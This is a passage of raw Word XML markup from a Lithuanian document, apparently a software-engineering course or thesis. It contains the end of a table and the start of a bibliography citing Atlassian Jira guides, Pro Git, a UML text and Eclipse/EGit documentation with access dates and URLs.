          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009E70D0" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0"/>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1001" w:name="_Toc500413798"/>
      <w:bookmarkStart w:id="1002" w:name="_Toc10444041"/>
      <w:bookmarkStart w:id="1003" w:name="_Toc13095588"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00D76482" w:rsidRPr="00F062DF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Literatūros sąrašas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1001"/>
      <w:bookmarkEnd w:id="1002"/>
      <w:bookmarkEnd w:id="1003"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="005D462D" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="009856A7">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00444BFC" w:rsidRPr="00444BFC">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00444BFC" w:rsidRPr="00444BFC">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Create a project</w:t>
      </w:r>
      <w:r w:rsidR="00444BFC" w:rsidRPr="00444BFC">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId227" w:history="1">
        <w:r w:rsidR="00444BFC" w:rsidRPr="00444BFC">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/get-started-with-jira-core/create-a-project-917965385.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00444BFC" w:rsidRPr="00444BFC">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D24834" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="009856A7">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E85643" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00E85643" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Project management for non-project managers</w:t>
      </w:r>
      <w:r w:rsidR="00E85643" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId228" w:history="1">
        <w:r w:rsidR="00E85643" w:rsidRPr="003546C9">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.atlassian.com/project-management.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E85643" w:rsidRPr="003546C9">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009856A7" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="00E85643" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00E85643" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jira Software best practices</w:t>
      </w:r>
      <w:r w:rsidR="00E85643" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId229" w:history="1">
        <w:r w:rsidR="00E85643" w:rsidRPr="005B3E4C">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.atlassian.com/software/jira/guides/getting-started/best-practices.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E85643" w:rsidRPr="005B3E4C">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009856A7" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="00CC0791" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00CC0791" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jira Sprints Tutorial</w:t>
      </w:r>
      <w:r w:rsidR="00CC0791" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId230" w:history="1">
        <w:r w:rsidR="00CC0791" w:rsidRPr="00BC5DCD">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.atlassian.com/agile/tutorials/sprints.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CC0791" w:rsidRPr="00BC5DCD">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009856A7" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidR="00CC0791" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00CC0791" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Working with issues</w:t>
      </w:r>
      <w:r w:rsidR="00CC0791" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId231" w:history="1">
        <w:r w:rsidR="00CC0791" w:rsidRPr="00BC5DCD">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jirasoftwarecloud/working-with-issues-764478424.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CC0791" w:rsidRPr="00BC5DCD">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009856A7" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidR="00CC0791" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00CC0791" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Creating issues and sub-tasks</w:t>
      </w:r>
      <w:r w:rsidR="00CC0791" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId232" w:history="1">
        <w:r w:rsidR="00CC0791" w:rsidRPr="00BC5DCD">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jirasoftwarecloud/creating-issues-and-sub-tasks-764478439.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CC0791" w:rsidRPr="00BC5DCD">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009856A7" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidR="00CC0791" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00CC0791" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Deploying a release.</w:t>
      </w:r>
      <w:r w:rsidR="00CC0791" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId233" w:history="1">
        <w:r w:rsidR="00CC0791" w:rsidRPr="00BC5DCD">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jirasoftwarecloud/deploying-a-release-764478183.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CC0791" w:rsidRPr="00BC5DCD">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009856A7" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r w:rsidR="00EE59B3" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00EE59B3" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Basic searching</w:t>
      </w:r>
      <w:r w:rsidR="00EE59B3" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId234" w:history="1">
        <w:r w:rsidR="00EE59B3" w:rsidRPr="00EE59B3">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jirasoftwarecloud/basic-searching-764478306.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00EE59B3" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009856A7" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r w:rsidR="00EE59B3" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00EE59B3" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Searching for issues</w:t>
      </w:r>
      <w:r w:rsidR="00EE59B3" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId235" w:history="1">
        <w:r w:rsidR="00EE59B3" w:rsidRPr="00EE59B3">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jirasoftwarecloud/searching-for-issues-764478280.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00EE59B3" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009856A7" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r w:rsidR="00EE59B3" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00EE59B3" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Advanced searching</w:t>
      </w:r>
      <w:r w:rsidR="00EE59B3" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId236" w:history="1">
        <w:r w:rsidR="00EE59B3" w:rsidRPr="00EE59B3">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jirasoftwareserver073/advanced-searching-861256227.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00EE59B3" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009856A7" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">11. </w:t>
      </w:r>
      <w:r w:rsidR="00F062DF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00F062DF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Atlassian Documentation</w:t>
      </w:r>
      <w:r w:rsidR="00F062DF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId237" w:history="1">
        <w:r w:rsidR="00F062DF" w:rsidRPr="00583BED">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/alldoc/atlassian-documentation-32243719.html.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00624F5D" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">12. </w:t>
      </w:r>
      <w:r w:rsidR="00F062DF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Chacon, S., Straub, B. (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00F062DF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Pro Git</w:t>
      </w:r>
      <w:r w:rsidR="00F062DF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Apress. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId238" w:history="1">
        <w:r w:rsidR="00F062DF" w:rsidRPr="00912D1C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:u w:val="none"/>
            <w:lang w:eastAsia="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/book/en/v2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F062DF" w:rsidRPr="00912D1C">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00444784" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">13. </w:t>
      </w:r>
      <w:r w:rsidR="00F062DF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Cheesman, J., Daniels, J. (2000). </w:t>
      </w:r>
      <w:r w:rsidR="00F062DF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>UML Components: A Simple Process for Specifying Component-Based Software</w:t>
      </w:r>
      <w:r w:rsidR="00F062DF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Addison-Wesley Professional.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00444784" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14. </w:t>
      </w:r>
      <w:r w:rsidR="00416FFD">
        <w:t xml:space="preserve">Eclipse. </w:t>
      </w:r>
      <w:r w:rsidR="00416FFD" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="0086624A" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId239" w:history="1">
        <w:r w:rsidR="0086624A" w:rsidRPr="00B94A64">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:u w:val="none"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://www.eclipse.org/downloads/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00444784" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">15. </w:t>
      </w:r>
      <w:r w:rsidR="0086624A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Eclipse (2019). Eclipse Documentation. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId240" w:history="1">
        <w:r w:rsidR="0086624A" w:rsidRPr="00B94A64">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:u w:val="none"/>
            <w:lang w:eastAsia="lt-LT"/>
          </w:rPr>
          <w:t>http://help.eclipse.org/2019-03/index.jsp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00444784" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">16. </w:t>
      </w:r>
      <w:r w:rsidR="003F263C" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">EclipseSource (2019). </w:t>
      </w:r>
      <w:r w:rsidR="003F263C" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Installing EGit in Eclipse</w:t>
      </w:r>
      <w:r w:rsidR="003F263C" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId241" w:history="1">
        <w:r w:rsidR="003F263C" w:rsidRPr="00B94A64">
          <w:rPr>
            <w:i/>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://eclipsesource.com/blogs/tutorials/egit-tutorial.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00444784" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
